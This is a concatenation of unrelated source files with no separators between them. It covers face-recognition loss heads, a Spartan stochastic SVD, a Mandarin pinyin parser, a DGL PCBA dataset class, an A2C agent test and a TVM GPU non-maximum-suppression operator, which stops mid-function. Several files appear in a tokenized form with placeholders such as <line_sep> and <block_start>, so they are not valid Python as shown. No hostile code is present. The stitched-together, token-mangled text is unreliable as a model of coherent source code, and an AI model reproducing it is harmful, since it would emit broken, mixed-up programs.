<import_from_stmt>head.metrics *<import_from_stmt>head.metrics_parallel *<line_sep>HEAD_DICT={"Softmax":Softmax "ArcFace":ArcFace "Combined":Combined "CosFace":CosFace "SphereFace":SphereFace "Am_softmax":Am_softmax "CurricularFace":CurricularFace "ArcNegFace":ArcNegFace "SVX":SVXSoftmax "AirFace":AirFace "QAMFace":QAMFace "CircleLoss":CircleLoss "ParallelArcFace":ParallelArcFace }<line_sep>
<import_stmt>spartan<import_from_stmt>spartan core expr util blob_ctx<import_stmt>numpy<as>np<import_from_stmt>.qr qr<def_stmt>svd A k=<none><block_start>""" Stochastic SVD. Parameters ---------- A : spartan matrix Array to compute the SVD on, of shape (M, N) k : int, optional Number of singular values and vectors to compute. The operations include matrix multiplication and QR decomposition. We parallelize both of them. Returns -------- U : Spartan array of shape (M, k) S : numpy array of shape (k,) V : numpy array of shape (k, k) """<if_stmt>k<is><none><block_start>k=A.shape[1]<block_end>Omega=expr.randn(A.shape[1] k)<line_sep>Y=expr.dot(A Omega)<line_sep>Q,R=qr(Y)<line_sep>B=expr.dot(expr.transpose(Q) A)<line_sep>BTB=expr.dot(B expr.transpose(B)).optimized().glom()<line_sep>S,U_=np.linalg.eig(BTB)<line_sep>S=np.sqrt(S)<line_sep># Sort by eigen values from large to small si=np.argsort(S)[::-1]<line_sep>S=S[si]<line_sep>U_=U_[: si]<line_sep>U=expr.dot(Q U_).optimized().evaluate()<line_sep>V=np.dot(np.dot(expr.transpose(B).optimized().glom() U_) np.diag(np.ones(S.shape[0])/S))<line_sep><return>U S V.T<block_end>
import os

from util import register

# Mandarin syllable initials (two-letter initials listed before their
# one-letter prefixes for longest-match use).
mandarin_initial_list = ["b", "ch", "c", "d", "f", "g", "h", "j", "k", "l", "m",
                         "n", "p", "q", "r", "sh", "s", "t", "x", "zh", "z"]

# fuse rear case to avoid OOV
special_phone_map = {}

# punc list
punc_list = ['_FH', '_MH', '_DUN', '_DH', '_WH', '_OPUNC']

special_phn_list = ['_WORD_SEG#1', '_WORD_SEG#2', '_WORD_SEG#3', '_WORD_SEG#4',
                    '_HEAD', '_SPS_SEG', '_JH_E', '_WH_E', '_TH_E']

# Functional punctuation: rare marks collapse onto the generic _OPUNC symbol.
punc_map = {'_FH': '_FH', '_MH': '_MH', '_DUN': '_DUN', '_DH': '_DH',
            '_WH': '_WH', '_TH': '_TH', '_DYH': '_OPUNC', '_KH': '_OPUNC',
            '_PZH': '_OPUNC', '_SLH': '_OPUNC', '_SMH': '_OPUNC',
            '_SYH': '_OPUNC', '_YD': '_OPUNC'}

# Post-pass remapping applied to the fully assembled sentence sequence.
final_punc_map = {'_DH_E': '_JH_E', '_JH': '_DH', '_OPUNC_E': '_JH_E'}

# Registries filled by the @register.register decorators below.
parse_pinyin_methods = {}
parse_line_methods = {}
parse_sent_methods = {}


def split_phone_tone(s):
    """Split a trailing tone digit off a phone, e.g. 'a1' -> ['a', '1'].

    A string without a trailing tone digit is returned unsplit as [s].
    """
    head = s.rstrip('0123456')
    if len(head) == len(s):
        return [s]
    return [head, s[len(head):]]


@register.register('PHN_TONE_SEP', parse_pinyin_methods)
def parse_pinyin_phn_tone_sep(py):
    """Parse one '-'-joined syllable, emitting tones as separate symbols."""
    outputs = []
    for phn in py.split('-'):
        if phn in special_phone_map:
            phn = special_phone_map[phn]
        outputs.extend(split_phone_tone(phn))
    # Bug fix: the original branched on py.islower() here, but both branches
    # were byte-identical, so the dead conditional has been removed.
    return outputs


@register.register('PHN_TONE', parse_pinyin_methods)
def parse_pinyin_phn_tone(py):
    """Parse one '-'-joined syllable, keeping the tone attached to the final."""
    phns = py.split('-')
    outputs = []
    if py.islower():
        # Regular syllable: only the last phone may need the OOV fusion remap.
        if len(phns) == 1:
            outputs.append(phns[0])
        else:
            yun_tail = phns[-1]
            if yun_tail in special_phone_map:
                yun_tail = special_phone_map[yun_tail]
            outputs.extend(phns[:-1] + [yun_tail])
    else:
        # Non-lowercase (special) symbols: remap each phone independently.
        for phn in phns:
            outputs.append(special_phone_map.get(phn, phn))
    return outputs


def parse_pinyin(pronoun_line, py_type):
    """Parse the pinyin field (last column) of a pronunciation line.

    Each '|'-separated syllable is prefixed with a '_SPS_SEG' separator.
    Raises ValueError when *py_type* has no registered pinyin parser.
    """
    pinyin_str = pronoun_line.split()[-1]
    pinyins = [py for py in pinyin_str.split("|") if py != ""]
    try:
        outputs = []
        for py in pinyins:
            outputs.append('_SPS_SEG')
            outputs.extend(parse_pinyin_methods[py_type](py))
    except KeyError:
        raise ValueError('parse_pinyin for [{}] is not implemented'.format(py_type))
    return outputs


def parse_punct(pronoun_line):
    """Build the word-segmentation / punctuation suffix for a line.

    Column 3 holds the punctuation mark ('0' for none); the second-to-last
    column holds the prosodic word boundary sign ('#0' means no boundary).
    """
    parts = pronoun_line.split()
    punct_part = parts[3]
    prosody_word_seg_sign = parts[-2]
    if prosody_word_seg_sign == '#0':
        return []
    suffix = ['_WORD_SEG' + prosody_word_seg_sign]
    if punct_part != '0':
        punc = '_' + punct_part.upper()
        suffix.append(punc_map.get(punc, punc))
    return suffix


def parse_pos(pronoun_line):
    """Return the part-of-speech tag (column 1) prefixed with '~'."""
    return '~' + pronoun_line.split()[1]


@register.register(['PHN', 'PHN_TONE', 'PHN_TONE_SEP', 'SHENGYUN'], parse_line_methods)
def parse_line_default(pronoun_line, py_type):
    """Default line parser: pinyin symbols followed by the punctuation suffix."""
    return parse_pinyin(pronoun_line, py_type) + parse_punct(pronoun_line)


def parse_line(pronoun_line, py_type):
    """Dispatch to the line parser registered for *py_type*."""
    try:
        return parse_line_methods[py_type](pronoun_line, py_type)
    except KeyError:
        raise ValueError('parse_line for [{}] is not implemented'.format(py_type))


@register.register(['PHN', 'PHN_TONE', 'PHN_TONE_SEP', 'SHENGYUN'], parse_sent_methods)
def parse_sent_default(pronoun_lines, py_type, use_head, use_tail):
    """Default sentence parser.

    Concatenates per-line symbol sequences, marks the last line's trailing
    functional symbol with an '_E' (end) suffix, applies `final_punc_map`,
    and optionally wraps the sequence in '_HEAD' / '_TAIL'.
    """
    sent_outputs = ['_HEAD'] if use_head else []
    last_idx = len(pronoun_lines) - 1
    for line_idx, pronoun_line in enumerate(pronoun_lines):
        # Skip blanks and comment/markup lines.
        if pronoun_line == '' or pronoun_line.startswith('#') or pronoun_line.startswith('['):
            continue
        line_outputs = parse_line(pronoun_line, py_type)
        if line_idx == last_idx and line_outputs[-1].startswith('_'):
            line_outputs[-1] += '_E'
        sent_outputs.extend(line_outputs)
    # Idiom fix: the try/except-KeyError/pass remap loop is now a dict.get
    # comprehension with identical behavior (unknown symbols pass through).
    sent_outputs = [final_punc_map.get(phn, phn) for phn in sent_outputs]
    if use_tail:
        sent_outputs.append('_TAIL')
    return sent_outputs


def parse_sent(pronoun_lines, py_type, use_head=True, use_tail=True):
    """Dispatch to the sentence parser registered for *py_type*."""
    try:
        return parse_sent_methods[py_type](pronoun_lines, py_type, use_head, use_tail)
    except KeyError:
        raise ValueError('parse_sent for [{}] is not implemented'.format(py_type))
# -*- coding: utf-8 -*-
#
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# PCBA from MoleculeNet for the prediction of biological activities

import pandas as pd

from dgl.data.utils import get_download_dir, download, _get_dgl_url, extract_archive

from .csv_dataset import MoleculeCSVDataset
from ..utils.mol_to_graph import smiles_to_bigraph

__all__ = ['PCBA']


class PCBA(MoleculeCSVDataset):
    r"""PCBA from MoleculeNet for the prediction of biological activities

    PubChem BioAssay (PCBA) is a database of biological activities of small
    molecules generated by high-throughput screening. This dataset is a
    subset of PCBA, containing 128 bioassays measured over 400 thousand
    compounds.

    References:

        * [1] MoleculeNet: A Benchmark for Molecular Machine Learning.
        * [2] Massively Multitask Networks for Drug Discovery.

    Parameters
    ----------
    smiles_to_graph: callable, str -> DGLGraph
        A function turning a SMILES string into a DGLGraph.
        Default to :func:`dgllife.utils.smiles_to_bigraph`.
    node_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
        Featurization for nodes like atoms in a molecule, which can be used
        to update ndata for a DGLGraph. Default to None.
    edge_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
        Featurization for edges like bonds in a molecule, which can be used
        to update edata for a DGLGraph. Default to None.
    load : bool
        Whether to load the previously pre-processed dataset or pre-process
        from scratch. Default to False.
    log_every : bool
        Print a message every time ``log_every`` molecules are processed.
        Default to 1000.
    cache_file_path : str
        Path to the cached DGLGraphs, default to 'pcba_dglgraph.bin'.
    n_jobs : int
        The maximum number of concurrently running jobs for graph
        construction and featurization, using joblib backend. Default to 1.

    Molecule ids are available as ``dataset.ids``; set
    ``dataset.load_full = True`` to also get the id from ``__getitem__``.
    Use ``dataset.task_pos_weights(train_ids)`` to re-weight positive samples
    per task.
    """

    def __init__(self,
                 smiles_to_graph=smiles_to_bigraph,
                 node_featurizer=None,
                 edge_featurizer=None,
                 load=False,
                 log_every=1000,
                 cache_file_path='./pcba_dglgraph.bin',
                 n_jobs=1):
        # Fetch and unpack the raw csv shipped with DGL.
        self._url = 'dataset/pcba.zip'
        data_path = get_download_dir() + '/pcba.zip'
        dir_path = get_download_dir() + '/pcba'
        download(_get_dgl_url(self._url), path=data_path, overwrite=False)
        extract_archive(data_path, dir_path)
        df = pd.read_csv(dir_path + '/pcba.csv')

        # Molecule ids are kept aside; the label frame must not contain them.
        self.ids = df['mol_id'].tolist()
        self.load_full = False
        df = df.drop(columns=['mol_id'])

        super(PCBA, self).__init__(df=df,
                                   smiles_to_graph=smiles_to_graph,
                                   node_featurizer=node_featurizer,
                                   edge_featurizer=edge_featurizer,
                                   smiles_column='smiles',
                                   cache_file_path=cache_file_path,
                                   load=load,
                                   log_every=log_every,
                                   init_mask=True,
                                   n_jobs=n_jobs)

        # Keep only ids of molecules that survived graph construction.
        self.ids = [self.ids[i] for i in self.valid_ids]

    def __getitem__(self, item):
        """Get datapoint with index

        Parameters
        ----------
        item : int
            Datapoint index

        Returns
        -------
        str
            SMILES for the ith datapoint
        DGLGraph
            DGLGraph for the ith datapoint
        Tensor of dtype float32 and shape (T)
            Labels of the ith datapoint for all T tasks.
        Tensor of dtype float32 and shape (T)
            Binary masks indicating the existence of labels for all tasks.
        str, optional
            Id for the ith datapoint, returned only when ``self.load_full``
            is True.
        """
        record = (self.smiles[item], self.graphs[item],
                  self.labels[item], self.mask[item])
        if self.load_full:
            record = record + (self.ids[item],)
        return record
<import_from_stmt>collections namedtuple<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_from_stmt>rl.agents.a2c.agent A2CAgent<line_sep>TestArgType=namedtuple('ArgType' ['name'])<line_sep>arg_type=TestArgType('arg')<line_sep>A=np.array<class_stmt>A2CAgentTest(tf.test.TestCase)<block_start><def_stmt>test_compute_policy_log_probs self<block_start><import_from_stmt>rl.agents.a2c.agent compute_policy_log_probs<line_sep>available_actions=A([[1 0 1] [1 0 0] [1 1 1]] dtype=np.float32)<line_sep>fn_pi=A([[0.2 0.0 0.8] [1.0 0.0 0.0] [0.2 0.7 0.1]] dtype=np.float32)<line_sep>fn_ids=A([2 0 1] dtype=np.int32)<line_sep>arg_pi={arg_type:A([[0.8 0.2] [0.0 1.0] [0.5 0.5]] dtype=np.float32)}<line_sep>arg_ids={arg_type:A([0 1 -1] dtype=np.int32)}<line_sep>log_probs=compute_policy_log_probs(available_actions (fn_pi arg_pi) (fn_ids arg_ids))<line_sep>expected_log_probs=np.log([0.8 1.0 0.7])+A([np.log(0.8) np.log(1.0) 0])<with_stmt>self.test_session()<as>sess<block_start>log_probs_out=sess.run(log_probs)<line_sep>self.assertAllClose(log_probs_out expected_log_probs)<block_end><block_end><def_stmt>test_compute_policy_entropy self<block_start><import_from_stmt>rl.agents.a2c.agent compute_policy_entropy<line_sep>available_actions=A([[1 0 1] [1 0 0] [1 1 1]] dtype=np.float32)<line_sep>fn_pi=A([[0.2 0.0 0.8] [1.0 0.0 0.0] [0.2 0.7 0.1]] dtype=np.float32)<line_sep>fn_ids=A([2 0 1] dtype=np.int32)<line_sep>arg_pi={arg_type:A([[0.8 0.2] [0.0 1.0] [0.5 0.5]] dtype=np.float32)}<line_sep>arg_ids={arg_type:A([0 1 -1] dtype=np.int32)}<line_sep>entropy=compute_policy_entropy(available_actions (fn_pi arg_pi) (fn_ids arg_ids))<line_sep>expected_entropy=(0.50040245+0.80181855)/3.0+(0.50040245)/2<with_stmt>self.test_session()<as>sess<block_start>entropy_out=sess.run(entropy)<line_sep>self.assertAllClose(entropy_out expected_entropy)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end>
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=invalid-name, no-member, too-many-locals, too-many-arguments, too-many-statements, singleton-comparison # pylint: disable=bad-continuation, unused-argument """Non-maximum suppression operator"""<import_stmt>tvm<import_from_stmt>tvm te<import_from_stmt>tvm.contrib nvcc<import_from_stmt>tvm.contrib.thrust can_use_thrust can_use_rocthrust<import_from_stmt>tvm.ir register_intrin_lowering<import_from_stmt>tvm.tir if_then_else<import_from_stmt>.sort argsort argsort_thrust<import_from_stmt>.scan exclusive_scan<import_from_stmt>..utils ceil_div<import_from_stmt>..math cast<import_from_stmt>..transform reshape<import_from_stmt>..vision.nms_util calculate_overlap binary_search collect_selected_indices collect_selected_indices_and_scores run_all_class_nms <def_stmt>cuda_atomic_add_rule op<block_start><if_stmt>op.dtype<eq>"float32"<block_start><return>tvm.tir.call_pure_extern("float32" "atomicAdd" op.args[0] op.args[1])<block_end><if_stmt>op.dtype<eq>"float64"<block_start><return>tvm.tir.call_pure_extern("float64" "atomicAdd" op.args[0] op.args[1])<block_end><if_stmt>op.dtype<eq>"int32"<block_start><return>tvm.tir.call_pure_extern("int32" "atomicAdd" op.args[0] 
op.args[1])<block_end><raise>RuntimeError("only support int32, float32 and float64")<block_end><def_stmt>opencl_atomic_add_rule op<block_start><if_stmt>op.dtype<eq>"int32"<block_start><return>tvm.tir.call_pure_extern("int32" "atomic_add" op.args[0] op.args[1])<block_end><raise>RuntimeError("only support int32")<block_end>register_intrin_lowering("tir.atomic_add" target="cuda" f=cuda_atomic_add_rule level=99)<line_sep>register_intrin_lowering("tir.atomic_add" target="opencl" f=opencl_atomic_add_rule level=99)<def_stmt>atomic_add x y<block_start><return>tvm.tir.call_intrin(y.dtype "tir.atomic_add" x y)<block_end><def_stmt>get_valid_boxes_ir data valid_boxes score_threshold id_index score_index<block_start>"""Low level IR to identify bounding boxes given a score threshold. Parameters ---------- data : Buffer Input data. 3-D Buffer with shape [batch_size, num_anchors, elem_length]. score_threshold : Buffer or float32 Lower limit of score for valid bounding boxes. id_index : optional, int index of the class categories, -1 to disable. score_index: optional, int Index of the scores/confidence of boxes. Returns ------- valid_boxes: Buffer 2D Buffer indicating valid boxes with shape [batch_size, num_anchors]. 
"""<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>elem_length=data.shape[2]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>data=ib.buffer_ptr(data)<line_sep>valid_boxes=ib.buffer_ptr(valid_boxes)<if_stmt>isinstance(score_threshold float)<block_start>score_threshold=tvm.tir.FloatImm("float32" score_threshold)<block_end>id_index=tvm.tir.IntImm("int32" id_index)<line_sep>score_index=tvm.tir.IntImm("int32" score_index)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<with_stmt>ib.new_scope()<block_start>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_anchors max_threads)<line_sep>nthread_by=batch_size<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>num_anchors)<block_start>i=by<line_sep>j=tid<line_sep>score=data[(i<times>num_anchors+j)<times>elem_length+score_index]<with_stmt>ib.if_scope(tvm.tir.all(score<g>score_threshold tvm.tir.any(id_index<l>0 data[(i<times>num_anchors+j)<times>elem_length+id_index]<ge>0) ))<block_start>valid_boxes[i<times>num_anchors+j]=1<block_end><with_stmt>ib.else_scope()<block_start>valid_boxes[i<times>num_anchors+j]=0<block_end><block_end><block_end><return>ib.get()<block_end><def_stmt>get_valid_counts_ir data valid_indices valid_boxes out out_indices<block_start>"""Low level IR to get valid count of bounding boxes given a score threshold. Also prepares to move valid boxes to the top of input data. Parameters ---------- data : Buffer Input data. 3-D Buffer with shape [batch_size, num_anchors, elem_length]. valid_indices: Buffer 2D Buffer of flag indicating valid data with shape [batch_size, num_anchors]. 
Returns ------- out : Buffer Sorted valid boxes out_indices : Buffer Incidices of valid boxes in original data """<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>elem_length=data.shape[2]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>data=ib.buffer_ptr(data)<line_sep>valid_indices=ib.buffer_ptr(valid_indices)<line_sep>valid_boxes=ib.buffer_ptr(valid_boxes)<line_sep>out=ib.buffer_ptr(out)<line_sep>out_indices=ib.buffer_ptr(out_indices)<line_sep>one=tvm.tir.const(1 dtype=out.dtype)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=num_anchors<floordiv>max_threads+1<line_sep>nthread_by=batch_size<with_stmt>ib.new_scope()<block_start>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>num_anchors)<block_start>i=by<line_sep>j=tid<with_stmt>ib.for_range(0 elem_length)<as>k<block_start>out[(i<times>num_anchors+j)<times>elem_length+k]=-one<block_end>out_indices[i<times>num_anchors+j]=-1<block_end><block_end><with_stmt>ib.new_scope()<block_start>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>num_anchors)<block_start>i=by<line_sep>j=tid<with_stmt>ib.if_scope(valid_boxes[i tid]<g>0)<block_start><with_stmt>ib.for_range(0 elem_length)<as>k<block_start>out[(i<times>num_anchors+valid_indices[i 
tid])<times>elem_length+k]=data[(i<times>num_anchors+j)<times>elem_length+k]<block_end>out_indices[i<times>num_anchors+valid_indices[i tid]]=j<block_end><block_end><block_end><return>ib.get()<block_end><def_stmt>get_valid_counts data score_threshold=0 id_index=0 score_index=1<block_start>"""Get valid count of bounding boxes given a score threshold. Also moves valid boxes to the top of input data. Parameters ---------- data : tvm.te.Tensor Input data. 3-D tensor with shape [batch_size, num_anchors, elem_length]. score_threshold : optional, tvm.te.Tensor or float Lower limit of score for valid bounding boxes. id_index : optional, int index of the class categories, -1 to disable. score_index: optional, int Index of the scores/confidence of boxes. Returns ------- valid_count : tvm.te.Tensor 1-D tensor for valid number of boxes. out_tensor : tvm.te.Tensor Rearranged data tensor. """<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>data_buf=tvm.tir.decl_buffer(data.shape data.dtype "data_buf" data_alignment=8)<line_sep>valid_boxes_buf=tvm.tir.decl_buffer((batch_size num_anchors) "int32" "valid_boxes_buf" data_alignment=8)<line_sep>valid_boxes=te.extern([(batch_size num_anchors)] [data] <lambda>ins outs:get_valid_boxes_ir(ins[0] outs[0] score_threshold id_index score_index) dtype=["int32"] in_buffers=[data_buf] out_buffers=[valid_boxes_buf] name="get_valid_boxes" tag="get_valid_boxes_gpu" )<line_sep>valid_indices_buf=tvm.tir.decl_buffer((batch_size num_anchors) "int32" "valid_indices_buf" data_alignment=8)<line_sep>valid_indices,valid_count=exclusive_scan(valid_boxes axis=1 return_reduction=<true>)<line_sep>out_buf=tvm.tir.decl_buffer(data.shape data.dtype "out_buf" data_alignment=8)<line_sep>out_indices_buf=tvm.tir.decl_buffer((batch_size num_anchors) "int32" "out_buf" data_alignment=8)<line_sep>out,out_indices=te.extern([data.shape (batch_size num_anchors)] [data valid_indices valid_boxes] <lambda>ins outs:get_valid_counts_ir(ins[0] ins[1] 
ins[2] outs[0] outs[1]) dtype=["int32" data.dtype] in_buffers=[data_buf valid_indices_buf valid_boxes_buf] out_buffers=[out_buf out_indices_buf] name="get_valid_counts" tag="get_valid_counts_gpu" )<line_sep><return>[valid_count out out_indices]<block_end><def_stmt>_nms_loop ib batch_size top_k iou_threshold max_output_size valid_count on_new_valid_box_func on_new_invalidated_box_func needs_bbox_check_func calc_overlap_func out_scores num_valid_boxes <block_start>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<with_stmt>ib.new_scope()<block_start>nthread_by=batch_size<line_sep>nthread_tx=max_threads<line_sep># Some cuda architectures have smaller limit of 32K for cudaDevAttrMaxRegistersPerBlock # vs 64K for most GPUs. Since this kernel uses many registers (around 35), the limit will # be exceeded with 1024 threads. target=tvm.target.Target.current(allow_none=<false>)<if_stmt>target.kind.name<eq>"cuda"<block_start><if_stmt>nvcc.get_target_compute_version(target)<in>["3.2" "5.3" "6.2"]<block_start>nthread_tx=512<block_end><block_end>by=te.thread_axis("blockIdx.y")<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>num_valid_boxes_local=ib.allocate("int32" (1 ) name="num_valid_boxes_local" scope="local")<line_sep>num_valid_boxes_local[0]=0<def_stmt>nms_inner_loop ib i j nkeep# The box j is valid, invalidate other boxes that overlap with j above iou_threshold <block_start>on_new_valid_box_func(ib tx num_valid_boxes_local[0] i j)<line_sep>num_valid_boxes_local[0]<augadd>1<line_sep>num_iter_per_thread=ceil_div(nkeep-(j+1) nthread_tx)<with_stmt>ib.for_range(0 num_iter_per_thread name="_k")<as>_k<block_start>k=j+1+_k<times>nthread_tx+tx<with_stmt>ib.if_scope(tvm.tir.all(k<l>nkeep out_scores[i k]<g>0 # is the box k still valid? 
needs_bbox_check_func(i j k) ))<block_start>iou=calc_overlap_func(i j k)<with_stmt>ib.if_scope(iou<ge>iou_threshold)# invalidate the box k <block_start>out_scores[i k]=-1.0<line_sep>on_new_invalidated_box_func(i k)<block_end><block_end>ib.emit(tvm.tir.Call(<none> "tir.tvm_storage_sync" tvm.runtime.convert(["shared"])))<block_end><block_end>i=by<line_sep>nkeep=if_then_else(tvm.tir.all(top_k<g>0 top_k<l>valid_count[i]) top_k valid_count[i])<line_sep>max_output_size=if_then_else(max_output_size<g>0 max_output_size nkeep)<with_stmt>ib.if_scope(tvm.tir.all(iou_threshold<g>0 valid_count[i]<g>0))# Apply nms # No need to do more iteration if we have already reached max_output_size boxes <block_start>box_idx=ib.allocate("int32" (1 ) name="box_idx" scope="local")<line_sep>box_idx[0]=0<with_stmt>ib.while_loop(tvm.tir.all(box_idx[0]<l>nkeep num_valid_boxes_local[0]<l>max_output_size))# Proceed to the inner loop if the box with id box_idx is still valid <block_start><with_stmt>ib.if_scope(out_scores[i box_idx[0]]<g>-1.0)<block_start>nms_inner_loop(ib i box_idx[0] nkeep)<block_end>box_idx[0]<augadd>1<block_end><with_stmt>ib.if_scope(tx+0<eq>0)<block_start>num_valid_boxes[i]=num_valid_boxes_local[0]<block_end><block_end><with_stmt>ib.else_scope()<block_start>num_valid_boxes[i]=0<block_end><block_end><return>ib.get()<block_end><def_stmt>nms_ir data sorted_index valid_count indices out_bboxes out_scores out_class_ids out_features box_indices num_valid_boxes max_output_size iou_threshold force_suppress top_k coord_start id_index score_index return_indices <block_start>"""Low level IR routing for transform location in multibox_detection operator. Parameters ---------- data : Buffer Buffer of output boxes with class and score. sorted_index : Buffer Buffer of output box indexes sorted by score. valid_count : Buffer Buffer of number of valid output boxes. indices : Buffer indices in original tensor, with shape [batch_size, num_anchors], represents the index of box in original data. 
It could be the third output out_indices of get_valid_counts. The values in the second dimension are like the output of arange(num_anchors) if get_valid_counts is not used before non_max_suppression. out_bboxes : Buffer Output buffer, to be filled with sorted box coordinates. out_scores : Buffer Output buffer, to be filled with sorted scores. out_class_ids : Buffer Output buffer, to be filled with sorted class ids. box_indices : Buffer A indices tensor mapping sorted indices to original indices This is the first output of NMS when return_indices=True. num_valid_boxes : Buffer Record the number of boxes that have survived IOU tests. This is the second output of NMS when return_indices=True. max_output_size : int Max number of output valid boxes for each instance. By default all valid boxes are returned. iou_threshold : float Overlapping(IoU) threshold to suppress object with smaller score. force_suppress : boolean Whether to suppress all detections regardless of class_id. top_k : int Keep maximum top k detections before nms, -1 for no limit. coord_start : int Start index of the consecutive 4 coordinates. id_index : int index of the class categories, -1 to disable. score_index : optional, int Index of the scores/confidence of boxes. return_indices : boolean Whether to return box indices in input data. Returns ------- stmt : Stmt The result IR statement. 
"""<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>box_data_length=data.shape[2]<line_sep>num_features=out_features.shape[2]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>data=ib.buffer_ptr(data)<line_sep>sorted_index=ib.buffer_ptr(sorted_index)<line_sep>valid_count=ib.buffer_ptr(valid_count)<line_sep>indices=ib.buffer_ptr(indices)<line_sep># outputs out_bboxes=ib.buffer_ptr(out_bboxes)<line_sep>out_scores=ib.buffer_ptr(out_scores)<line_sep>out_class_ids=ib.buffer_ptr(out_class_ids)<line_sep>out_features=ib.buffer_ptr(out_features)<line_sep>box_indices=ib.buffer_ptr(box_indices)<line_sep>num_valid_boxes=ib.buffer_ptr(num_valid_boxes)<if_stmt>isinstance(iou_threshold float)<block_start>iou_threshold=tvm.tir.FloatImm("float32" iou_threshold)<block_end>top_k=tvm.tir.IntImm("int32" top_k)<line_sep>coord_start=tvm.tir.IntImm("int32" coord_start)<line_sep>id_index=tvm.tir.IntImm("int32" id_index)<line_sep>score_index=tvm.tir.IntImm("int32" score_index)<line_sep>force_suppress=tvm.tir.IntImm("int32" 1<if>force_suppress<else>0)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<with_stmt>ib.new_scope()<block_start>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_anchors max_threads)<line_sep>nthread_by=batch_size<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>i=by<line_sep>base_src_idx=i<times>num_anchors<times>box_data_length<line_sep>base_bbox_idx=i<times>num_anchors<times>4<line_sep>base_features_idx=i<times>num_anchors<times>num_features<with_stmt>ib.if_scope(tvm.tir.all(iou_threshold<g>0 valid_count[i]<g>0))# Reorder output <block_start>nkeep=if_then_else(tvm.tir.all(top_k<g>0 top_k<l>valid_count[i]) top_k 
valid_count[i])<line_sep>j=bx<times>max_threads+tx<with_stmt>ib.if_scope(j<l>nkeep)<block_start>src_idx=base_src_idx+sorted_index[i<times>num_anchors+j]<times>box_data_length<with_stmt>ib.for_range(0 4 kind="unroll")<as>k<block_start>out_bboxes[(base_bbox_idx+j<times>4+k)]=data[src_idx+coord_start+k]<block_end><with_stmt>ib.for_range(0 num_features kind="unroll")<as>k<block_start>out_features[(base_features_idx+j<times>num_features+k)]=data[src_idx+coord_start+4+k]<block_end>out_scores[i<times>num_anchors+j]=data[src_idx+score_index]<if_stmt>id_index<ge>0<block_start>out_class_ids[i<times>num_anchors+j]=data[src_idx+id_index]<block_end><block_end><with_stmt>ib.else_scope()# Indices > nkeep are discarded # Only needed for return_indices = False case <block_start><if_stmt>return_indices<is><false><block_start><with_stmt>ib.if_scope(j<l>num_anchors)<block_start><with_stmt>ib.for_range(0 4 kind="unroll")<as>k<block_start>out_bboxes[(base_bbox_idx+j<times>4+k)]=-1.0<block_end><with_stmt>ib.for_range(0 num_features kind="unroll")<as>k<block_start>out_features[(base_features_idx+j<times>num_features+k)]=-1.0<block_end>out_scores[i j]=-1.0<if_stmt>id_index<ge>0<block_start>out_class_ids[i j]=-1.0<block_end><block_end><block_end><block_end><if_stmt>return_indices<block_start><with_stmt>ib.if_scope(j<l>num_anchors)<block_start>box_indices[i<times>num_anchors+j]=-1<block_end><block_end><block_end><with_stmt>ib.else_scope()# Need to copy all boxes if not using return_indices 